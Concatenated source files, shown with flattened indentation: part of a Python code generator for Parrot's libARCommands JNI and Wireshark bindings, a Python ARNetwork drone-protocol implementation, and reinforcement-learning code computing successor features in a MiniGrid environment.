cfile.write (' }\n')
cfile.write (' \n')
cfile.write (' if (!failed)\n')
cfile.write (' {\n')
cfile.write (' decoder->javaDecoder = (*env)->NewGlobalRef(env, thizz);\n')
cfile.write (' if (decoder->javaDecoder == NULL)\n')
cfile.write (' {\n')
cfile.write (' failed = 1;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' \n')
cfile.write (' if (!failed)\n')
cfile.write (' {\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (decoder->nativeDecoder, ' + cCallbackName (ftr, cmd) + ', decoder);\n')
cfile.write ('\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if ((failed) && (decoder != NULL))\n')
cfile.write (' {\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (&decoder->nativeDecoder);\n')
cfile.write (' if (decoder->javaDecoder != NULL)\n')
cfile.write (' {\n')
cfile.write (' (*env)->DeleteGlobalRef(env, decoder->javaDecoder);\n')
cfile.write (' }\n')
cfile.write (' free(decoder);\n')
cfile.write (' decoder = NULL;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return (jlong) (intptr_t) decoder;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT void JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeDeleteDecoder (' + JNI_FIRST_ARGS + ', jlong jdecoder)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *) (intptr_t)jdecoder;\n')
cfile.write ('\n')
cfile.write (' if (decoder != NULL)\n')
cfile.write (' {\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (&decoder->nativeDecoder);\n')
cfile.write (' if (decoder->javaDecoder != NULL)\n')
cfile.write (' {\n')
cfile.write (' (*env)->DeleteGlobalRef(env, decoder->javaDecoder);\n')
cfile.write (' }\n')
cfile.write (' free(decoder);\n')
cfile.write (' }\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('/* END OF GENERAED CODE */\n')
cfile.close ()
cfile = open (paths.JNI_FILTER_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n')
cfile.write ('#include <jni.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jlong JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeNewFilter(' + JNI_FIRST_ARGS + ', jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (behavior, NULL);\n')
cfile.write (' return (jlong)(intptr_t)filter;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT void JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeDeleteFilter(' + JNI_FIRST_ARGS + ', jlong cFilter)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&filter);\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeFilterCommand(' + JNI_FIRST_ARGS + ', jlong cFilter, jlong cCommand, jint len)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' uint8_t *command = (uint8_t *)(intptr_t)cCommand;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' status = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (filter, command, len, NULL);\n')
cfile.write (' return (jint)status;\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (filter, behavior);\n')
cfile.write (' return (jint)err;\n')
cfile.write ('}\n')
cfile.write ('\n')
if ftr.classes:#project only
for cl in ftr.classes:
cfile.write (' // - Class ' + cl.name + '\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (filter, behavior);\n')
cfile.write (' return (jint)err;\n')
cfile.write ('}\n')
cfile.write ('\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior (filter, behavior);\n')
cfile.write (' return (jint)err;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('/* END OF GENERAED CODE */\n')
# Functions for tree file generation
# (Wireshark Plugin)
def dump_enum_table(ftr, cl, cmd, arg):
table = 'static struct arsdk_enum %s_%s_%s_%s_enum_tab[] = {\n' % (get_ftr_old_name(ftr), cl.name, cmd.name, arg.name)
value = 0
for enum in arg.enums:
comment = enum.doc.replace('\n', '\\n')
table += ' {\n'
table += ' .name = "%s",\n' % enum.name
table += ' .value = %s,\n' % AREnumValue(LIB_MODULE,
get_ftr_old_name(ftr).upper() + '_' +
cl.name.upper(),
cmd.name.upper() + '_' +
arg.name.upper(), enum.name)
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
value += 1
table = table + '};\n'
return table if arg.enums else ''
def dump_arg_table(ftr, cl, cmd):
table = 'static struct arsdk_arg %s_%s_%s_arg_tab[] = {\n' % (get_ftr_old_name(ftr),
cl.name,
cmd.name)
for arg in cmd.args:
comment = get_arg_doc(arg).replace('\n', '\\n')
if len(arg.enums) > 0:
enums = '%s_%s_%s_%s_enum_tab' % (get_ftr_old_name(ftr),
cl.name,
cmd.name,
arg.name)
nenums = 'ARRAY_SIZE(%s)' % enums
else:
enums = 'NULL'
nenums = '0'
table += ' {\n'
table += ' .name = "%s",\n' % arg.name
if isinstance(arg.argType, ArEnum):
table += ' .type = ARSDK_ARG_TYPE_ENUM,\n'
elif isinstance(arg.argType, ArBitfield):
table += ' .type = ARSDK_ARG_TYPE_%s,\n' % ArArgType.TO_STRING[arg.argType.btfType].upper()
else:
table += ' .type = ARSDK_ARG_TYPE_%s,\n' % ArArgType.TO_STRING[arg.argType].upper()
table += ' .enums = %s,\n' % enums
table += ' .nenums = %s,\n' % nenums
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
return table if cmd.args else ''
def dump_cmd_table(ftr, cl):
table = 'static struct arsdk_cmd %s_%s_cmd_tab[] = {\n' % (get_ftr_old_name(ftr),
cl.name)
for cmd in cl.cmds:
comment = cmd.doc.title.replace('\n', '\\n')
if len(cmd.args) > 0:
args = '%s_%s_%s_arg_tab' % (get_ftr_old_name(ftr), cl.name, cmd.name)
nargs = 'ARRAY_SIZE(%s)' % args
else:
args = 'NULL'
nargs = '0'
table += ' {\n'
table += ' .name = "%s",\n' % cmd.name
if cl.name == 'defaultCls':
enum_val = AREnumValue(LIB_MODULE,
ID_SUBMODULE,
get_ftr_old_name(ftr) +
'_CMD', cmd.name)
else:
enum_val = AREnumValue(LIB_MODULE,
ID_SUBMODULE,
get_ftr_old_name(ftr) + '_' + cl.name +
'_CMD', cmd.name)
table += ' .id = %s,\n' % enum_val
# ignore fields, .buf, .timeout, .listtype (are they used at all ?)
table += ' .args = %s,\n' % args
table += ' .nargs = %s,\n' % nargs
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
return table if cl.cmds else ''
def dump_class_table(ftr):
table = 'static struct arsdk_class %s_class_tab[] = {\n' % get_ftr_old_name(ftr)
for cl in ftr.classes:
comment = cl.doc.replace('\n', '\\n')
if len(cl.cmds) > 0:
cmds = get_ftr_old_name(ftr) + '_' + cl.name + '_cmd_tab'
ncmds = 'ARRAY_SIZE(%s)' % cmds
else:
cmds = 'NULL'
ncmds = '0'
table += ' {\n'
table += ' .name = "%s",\n' % cl.name
if cl.name != 'defaultCls':
table += ' .ident = %s,\n' % AREnumValue(LIB_MODULE,
ID_SUBMODULE,
get_ftr_old_name(ftr) + '_CLASS',
cl.name)
else:
table += ' .ident = 0,\n'
table += ' .cmds = %s,\n' % cmds
table += ' .ncmds = %s,\n' % ncmds
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
return table if len(ftr.classes) > 0 else ''
def dump_project_table(projects):
table = 'static struct arsdk_project arsdk_projects[] = {\n'
for proj in projects:
comment = proj.doc.replace('\n', '\\n')
if proj.classes and len(proj.classes) > 0:
classes = get_ftr_old_name(proj) + '_class_tab'
nclasses = 'ARRAY_SIZE(%s)' % classes
else:
classes = 'NULL'
nclasses = '0'
table += ' {\n'
table += ' .name = "%s",\n' % get_ftr_old_name(proj)
table += ' .ident = %s,\n' % AREnumValue(LIB_MODULE,
ID_SUBMODULE,
'FEATURE',
get_ftr_old_name(proj))
table += ' .classes = %s,\n' % classes
table += ' .nclasses = %s,\n' % nclasses
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
table += 'static const unsigned int arsdk_nprojects = '
table += 'ARRAY_SIZE(arsdk_projects);\n'
return table if len(projects) > 0 else ''
def dump_tree_header(ctx, filename):
allFeatures = ctx.features
hfile = open (filename, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY *\n')
hfile.write (' ********************************************/\n')
hfile.write ('\n')
hfile.write ('#define ARRAY_SIZE(_t) (sizeof(_t)/sizeof((_t)[0]))\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief libARCommands Tree dump.\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef _ARSDK_ARCOMMANDS_TREE_H\n')
hfile.write ('#define _ARSDK_ARCOMMANDS_TREE_H\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('#include <stdlib.h>\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write('enum arsdk_arg_type {\n')
hfile.write(' ARSDK_ARG_TYPE_ENUM,\n')
hfile.write(' ARSDK_ARG_TYPE_U8,\n')
hfile.write(' ARSDK_ARG_TYPE_I8,\n')
hfile.write(' ARSDK_ARG_TYPE_U16,\n')
hfile.write(' ARSDK_ARG_TYPE_I16,\n')
hfile.write(' ARSDK_ARG_TYPE_U32,\n')
hfile.write(' ARSDK_ARG_TYPE_I32,\n')
hfile.write(' ARSDK_ARG_TYPE_U64,\n')
hfile.write(' ARSDK_ARG_TYPE_I64,\n')
hfile.write(' ARSDK_ARG_TYPE_FLOAT,\n')
hfile.write(' ARSDK_ARG_TYPE_DOUBLE,\n')
hfile.write(' ARSDK_ARG_TYPE_STRING,\n')
hfile.write('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_enum {\n')
hfile.write (' const char *name;\n')
hfile.write (' unsigned int value;\n')
hfile.write (' const char *comment;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_arg {\n')
hfile.write (' const char *name;\n')
hfile.write (' enum arsdk_arg_type type;\n')
hfile.write (' struct arsdk_enum *enums;\n')
hfile.write (' unsigned int nenums;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_cmd {\n')
hfile.write (' const char *name;\n')
hfile.write (' unsigned int id;\n')
hfile.write (' struct arsdk_arg *args;\n')
hfile.write (' unsigned int nargs;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_class {\n')
hfile.write (' const char *name;\n')
hfile.write (' unsigned int ident;\n')
hfile.write (' struct arsdk_cmd *cmds;\n')
hfile.write (' unsigned int ncmds;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_project {\n')
hfile.write (' const char *name;\n')
hfile.write (' eARCOMMANDS_ID_FEATURE ident;\n')
hfile.write (' struct arsdk_class *classes;\n')
hfile.write (' unsigned int nclasses;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
# walk XML tree and dump C structures
for ftr in allFeatures:
defaultCls = ArClass('defaultCls', 0, '')
for cmd in ftr.cmds + ftr.evts:
cl = defaultCls if cmd.cls is None else cmd.cls
for arg in cmd.args:
hfile.write(dump_enum_table(ftr, cl, cmd, arg))
hfile.write(dump_arg_table(ftr, cl, cmd))
defaultCls.cmds = [cmd for cmd in (ftr.cmds + ftr.evts) if cmd.cls is None]
if ftr.classes is None:
ftr.classes = []
ftr.classes.append(defaultCls)
for cl in ftr.classes:
hfile.write(dump_cmd_table(ftr, cl))
hfile.write(dump_class_table(ftr))
hfile.write(dump_project_table(allFeatures))
hfile.write('#endif /* _ARSDK_ARCOMMANDS_TREE_H */\n')
hfile.close()
#===============================================================================
#===============================================================================
def native_list_files(ctx, outdir, paths):
# print c generated files
for f in paths.GENERATED_FILES:
print os.path.join(outdir, f)
#===============================================================================
#===============================================================================
def android_list_files(ctx, paths):
# print java enum class files
for ftr in ctx.features:
for enum in ftr.enums:
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, get_ftr_old_name(ftr), enum.name) + '.java'
for multiset in ftr.multisets:
print paths.JNIJ_OUT_DIR + ARJavaMultiSetType(LIB_MODULE, get_ftr_old_name(ftr), multiset.name) + '.java'
# print java listener class files
for ftr in ctx.features:
for cmd in ftr.cmds + ftr.evts:
print paths.JNIJ_OUT_DIR + interfaceName(ftr, cmd) + '.java'
# print java generated files
for f in paths.GENERATED_JAVA_FILES:
print os.path.join(outdir, f)
# print java enum files generated from enums C
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.java'
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + '.java'
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + '.java'
print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.java'
#===============================================================================
#===============================================================================
def jni_list_files(ctx, paths):
# print c generated files
for f in paths.GENERATED_JNI_FILES:
print os.path.join(outdir, f)
#===============================================================================
#===============================================================================
def list_files(ctx, outdir, extra):
paths = Paths(outdir)
if extra == "native":
native_list_files(ctx, outdir, paths)
elif extra == "android":
android_list_files(ctx, paths)
elif extra == "jni":
jni_list_files(ctx, paths)
#===============================================================================
#===============================================================================
def generate_files(ctx, outdir, extra):
paths = Paths(outdir)
if extra == "native":
# Generation
native_generateCmds(ctx, paths)
PREBUILD_ACTION = PACKAGES_DIR+'/ARSDKBuildUtils/Utils/Python/ARSDK_PrebuildActions.py'
os.system('python '+PREBUILD_ACTION+' --lib libARCommands --root '+LIBARCOMMANDS_DIR+' --outdir '+outdir + ' --disable-java')
elif extra == "java":
# Generation
java_generateCmds(ctx, paths)
elif extra == "jni":
# Generation
jni_generateCmds(ctx, paths)
elif extra == "tree":
dump_tree_header(ctx, './tree.h')
#===============================================================================
#===============================================================================
#if __name__ == "__main__":
# generateCmds()
```
#### File: PythonController/src/Bybop_Network.py
```python
import Bybop_NetworkAL
import struct
import threading
class NetworkStatus:
OK = 0
ERROR = 1
TIMEOUT = 2
class Network(object):
"""
Simple implementation of the ARNetwork protocol.
This implementation does not support intenal fifos. If multiple threads tries to send data on the
same buffer at the same time, the actual send order is undefined.
The 'send_data' call is blocking to allow simpler implementation, but is not doing busy waiting so
it can be called from a thread without locking the GIL in python implementations that use one.
This implementation use a listener to warn the application of newly received data. The listener
should implement a 'data_received' function accepting the following arguments:
- buf : The buffer on which this data was retrieved
- recv_data : The actual data, as a packed string (use the struct module to unpack)
And a 'did_disconnect' function, without arguments, which will be called if the product
does not send any data on the network (probably because we lost the network link, or
because the product has run out of battery)
"""
def __init__(self, ip, c2d_port, d2c_port, send_buffers, recv_buffers, listener):
"""
Create a new instance of ARNetwork.
The instance will manage internally its ARNetworkAL backend.
Arguments:
- ip (string) : The device address
- c2d_port : The remove reading port
- d2c_port : The local reading port
- send_buffers : List of buffers which should accept data from the application
(i.e. which will be given to the send_data function)
- recv_buffers : List of buffers which should accept incoming data
"""
self._netal = Bybop_NetworkAL.NetworkAL(ip, c2d_port, d2c_port, self)
self._listener = listener
self._send_buffers = list(send_buffers) # The application writed to these (send to network)
self._recv_buffers = list(recv_buffers) # The application reads from these (read from network)
self._send_seq = {}
self._recv_seq = {}
self._ack_events = {}
self._ack_seq = {}
self._buf_locks = {}
self._ack_events_lock = threading.Lock()
for sndb in self._send_buffers:
self._send_seq[sndb] = 0
self._buf_locks[sndb] = threading.Lock()
self._ack_events[sndb] = threading.Event()
self._ack_seq[sndb] = 0
for rcvb in self._recv_buffers:
self._recv_seq[rcvb] = 255
def stop(self):
"""
Stop the ARNetwork instance.
This also stops the ARNetworkAL backend.
This function has no effect on a stopped instance.
"""
self._netal.stop()
def restart(self):
"""
Restart the ARNetwork instance.
This also restarts the ARNetworkAL backend.
This function has no effect on a started instance.
"""
self._netal.start()
def _get_seq(self, buf):
if not buf in self._send_seq:
self._send_seq[buf] = 0
ret = self._send_seq[buf]
self._send_seq[buf] += 1
self._send_seq[buf] %= 256
return ret
def send_data(self, buf, data, type, timeout=0.15, tries=5):
"""
Send some data over the network, and return an ARNetworkStatus.
The keyword arguments are only used for acknowledged data.
For other data, the timeout is irrelevant, and only one try will be made.
For acknowledged data, this function will block until either the acknowledge is received,
or all the tries have been consumed in timeouts. For other data, this function returns
almost immediately.
Arguments:
- buf : The target buffer for the data (must be part of the send_buffers list given to __init__)
- data : The data to send
- type : The type of the data (needs ack or not)
Keyword arguments:
- timeout : Timeout in floating point number of seconds, or None if no timeout (default 0.15)
- tries : Total number of tries before considering a data as lost (default 5)
"""
if not buf in self._send_buffers:
return NetworkStatus.ERROR
seqnum = self._get_seq(buf)
needack = type == Bybop_NetworkAL.DataType.DATA_WITH_ACK
status = NetworkStatus.TIMEOUT
with self._buf_locks[buf]:
# If we need an ack, clear any pending ack event, and set the requested seqnum
if needack:
with self._ack_events_lock:
self._ack_events[buf].clear()
self._ack_seq[buf] = seqnum
# Try 'retries' times in case of timeouts
while tries > 0 and status == NetworkStatus.TIMEOUT:
tries -= 1
status = NetworkStatus.OK if self._netal.send_data(type, buf, seqnum, data) else NetworkStatus.ERROR
# We only set TIMEOUT status for acknowledged data
if needack and status == NetworkStatus.OK: # Data with ack properly sent
status = NetworkStatus.OK if self._ack_events[buf].wait(timeout) else NetworkStatus.TIMEOUT
return status
def _send_ack(self, buf, seq):
answer = struct.pack('<B', seq)
abuf = buf + 128
self._netal.send_data(Bybop_NetworkAL.DataType.ACK, abuf, self._get_seq(abuf), answer)
def _send_pong(self, data):
self._netal.send_data(Bybop_NetworkAL.DataType.DATA, 1, self._get_seq(1), data)
def _should_accept(self, buf, seq):
if not buf in self._recv_seq:
return False
prev = self._recv_seq[buf]
diff = seq - prev
ok = diff >= 0 or diff <= -10
if ok:
self._recv_seq[buf] = seq
return ok
def data_received(self, type, buf, seq, recv_data):
"""
Implementation of the NetworkAL listener.
This function should not be called direcly by application code !
"""
if buf == 0: # This is a ping, send a pong !
self._send_pong(recv_data)
if type == Bybop_NetworkAL.DataType.ACK:
ackbuf = buf - 128
if ackbuf in self._send_buffers:
seq = struct.unpack('<B', recv_data)[0]
with self._ack_events_lock:
if seq == self._ack_seq[ackbuf]:
self._ack_events[ackbuf].set()
elif type == Bybop_NetworkAL.DataType.DATA:
self._process_data(buf, seq, recv_data)
elif type == Bybop_NetworkAL.DataType.DATA_LOW_LATENCY:
self._process_data(buf, seq, recv_data)
elif type == Bybop_NetworkAL.DataType.DATA_WITH_ACK:
self._process_data(buf, seq, recv_data)
# And send ack !
self._send_ack(buf, seq)
def _process_data(self, buf, seq, recv_data):
if self._should_accept(buf, seq):
self._listener.data_received(buf, recv_data)
def did_disconnect(self):
"""
Implementation of the NetworkAL listener.
This function should not be called directly by application code !
"""
self._listener.did_disconnect()
``` |
{
"source": "2016choang/sfl",
"score": 2
} |
#### File: sfl/experiments/test_multiroom.py
```python
import json
import pickle
import gym
from gym_minigrid.wrappers import ReseedWrapper, RGBImgObsWrapper
import numpy as np
import torch
from rlpyt.envs.gym import make as gym_make
from rlpyt.models.dqn.dsr.grid_dsr_model import GridDsrModel
from rlpyt.models.dqn.dsr.idf_model import IDFModel
from rlpyt.utils.seed import set_seed
ENV_ID = 'MiniGrid-FourRooms-v0'
def visualize(config_file,
checkpoint,
output,
cuda_idx=None):
try:
with open(config_file, 'r') as f:
config = json.load(f)
except ValueError:
raise ValueError('Unable to read config file {}'.format(config_file))
mode = config['mode']
seed = config['seed']
set_seed(seed)
if cuda_idx is not None:
device = torch.device('cuda', index=cuda_idx)
else:
device = torch.device('cpu')
# load in checkpoint into agent
params = torch.load(checkpoint, map_location=device)
# sample all possible agent positions within environment
env = gym_make(id=ENV_ID, mode=mode, minigrid_config=config['env'])
env.reset()
SR = torch.zeros((env.grid.height, env.grid.width, 4, env.action_space.n, config['agent']['model_kwargs']['feature_size']),
dtype=torch.float)
SR += np.nan
feature_model = IDFModel(env.observation_space.shape, env.action_space.n, **config['agent']['idf_model_kwargs'])
feature_model.load_state_dict(params['agent_state_dict']['idf_model'])
feature_model.to(device)
model = GridDsrModel(env.observation_space.shape, env.action_space.n, **config['agent']['model_kwargs'])
model.load_state_dict(params['agent_state_dict']['model'])
model.to(device)
for room in env.rooms:
start_x, start_y = room.top
size_x, size_y = room.size
for direction in range(4):
for x in range(start_x + 1, start_x + size_x - 1):
for y in range(start_y + 1, start_y + size_y - 1):
env.env.env.unwrapped.agent_pos = np.array([x, y])
env.env.env.unwrapped.agent_dir = direction
obs, _, _, _ = env.env.env.step(5)
obs = torch.Tensor(obs).unsqueeze(0)
features = feature_model(obs.to(device), mode='encode')
SR[x, y, direction] = model(features, mode='dsr')
if room.exitDoorPos is not None:
exit_door = np.array(room.exitDoorPos)
env.env.env.unwrapped.agent_pos = exit_door
env.env.env.unwrapped.agent_dir = direction
obs, _, _, _ = env.env.env.step(5)
obs = torch.Tensor(obs).unsqueeze(0)
features = feature_model(obs.to(device), mode='encode')
SR[exit_door[0], exit_door[1], direction] = model(features, mode='dsr')
env.close()
torch.save(SR, output)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', help='config file')
parser.add_argument('--checkpoint', help='checkpoint file')
parser.add_argument('--output', help='output location')
parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=0)
args = parser.parse_args()
visualize(config_file=args.config,
checkpoint=args.checkpoint,
output=args.output,
cuda_idx=args.cuda_idx)
```
#### File: dqn/dsr/feature_dsr_agent.py
```python
import numpy as np
from sklearn.manifold import TSNE
import torch
from rlpyt.agents.base import AgentStep
from rlpyt.agents.dqn.dsr.dsr_agent import DsrAgent, AgentInfo
from rlpyt.agents.dqn.mixin import Mixin
from rlpyt.models.dqn.dsr.idf_model import IDFModel
from rlpyt.models.dqn.dsr.tcf_model import TCFModel
from rlpyt.models.dqn.dsr.grid_dsr_model import GridDsrModel
from rlpyt.models.utils import strip_ddp_state_dict
from rlpyt.utils.buffer import buffer_to
from rlpyt.utils.quick_args import save__init__args
class FeatureDSRAgent(Mixin, DsrAgent):
def __init__(self, feature_model_kwargs={}, initial_feature_model_state_dict=None, **kwargs):
save__init__args(locals())
ModelCls = GridDsrModel
super().__init__(ModelCls=ModelCls, **kwargs)
self.featureModelCls = None
def to_device(self, cuda_idx=None):
super().to_device(cuda_idx)
self.feature_model.to(self.device)
def initialize(self, env_spaces, share_memory=False,
global_B=1, env_ranks=None):
super().initialize(env_spaces, share_memory,
global_B=global_B, env_ranks=env_ranks)
self.feature_model = self.featureModelCls(**self.env_model_kwargs,
**self.feature_model_kwargs)
if self.initial_feature_model_state_dict is not None:
self.feature_model.load_state_dict(self.initial_feature_model_state_dict)
def encode(self, observation):
# Encode observation into feature representation
model_inputs = buffer_to(observation,
device=self.device)
features = self.feature_model(model_inputs, mode='encode')
return features.cpu()
def state_dict(self):
return dict(model=self.model.state_dict(),
target=self.target_model.state_dict(),
feature_model=self.feature_model.state_dict())
@torch.no_grad()
def step(self, observation, prev_action, prev_reward):
if self.distribution.epsilon >= 1.0:
# Random policy
action = torch.randint_like(prev_action, high=self.distribution.dim)
else:
# Epsilon-greedy over q-values generated with SF
model_inputs = buffer_to(observation,
device=self.device)
features = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to(features,
device=self.device)
dsr = self.model(model_inputs, mode='dsr')
model_inputs = buffer_to(dsr,
device=self.device)
q = self.model(model_inputs, mode='q')
q = q.cpu()
action = self.distribution.sample(q)
agent_info = AgentInfo(a=action)
return AgentStep(action=action, agent_info=agent_info)
def dsr_parameters(self):
return [param for name, param in self.model.named_parameters()]
def feature_parameters(self):
return [param for name, param in self.feature_model.named_parameters()]
@torch.no_grad()
def get_representations(self, env):
# Get features and SFs of possible observations
h, w = env.grid.height, env.grid.width
features = torch.zeros((h, w, 4, self.feature_model.feature_size), dtype=torch.float)
features += np.nan
dsr = torch.zeros((h, w, 4, env.action_space.n, self.model.feature_size), dtype=torch.float)
dsr += np.nan
for pos in env.get_possible_pos():
x, y = pos
for direction in range(4):
env.unwrapped.agent_pos = np.array([x, y])
env.unwrapped.agent_dir = direction
obs, _, _, _ = env.get_current_state()
model_inputs = buffer_to(torch.Tensor(obs).unsqueeze(0),
device=self.device)
features[x, y, direction] = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to(features[x, y, direction],
device=self.device)
dsr[x, y, direction] = self.model(model_inputs, mode='dsr')
return features, dsr
@torch.no_grad()
def get_representation_heatmap(self, representation, subgoal=(4, 13), mean_axes=(2, 3), distance='cos'):
representation = representation.detach().numpy()
representation_matrix = representation.mean(axis=mean_axes)
representation_matrix = representation_matrix / np.linalg.norm(representation_matrix, ord=2, axis=2, keepdims=True)
subgoal_representation = representation_matrix[subgoal]
side_size = representation_matrix.shape[0]
heatmap = np.zeros((side_size, side_size))
for x in range(side_size):
for y in range(side_size):
if distance == 'cos':
heatmap[x, y] = np.dot(representation_matrix[x, y], subgoal_representation)
elif distance == 'l2':
heatmap[x, y] = np.linalg.norm(representation_matrix[x, y] - subgoal_representation, ord=2)
else:
raise NotImplementedError
return heatmap
@torch.no_grad()
def get_q_values(self, env, dsr, subgoal=(4, 13), mean_axes=(2, )):
dsr = dsr.detach().numpy()
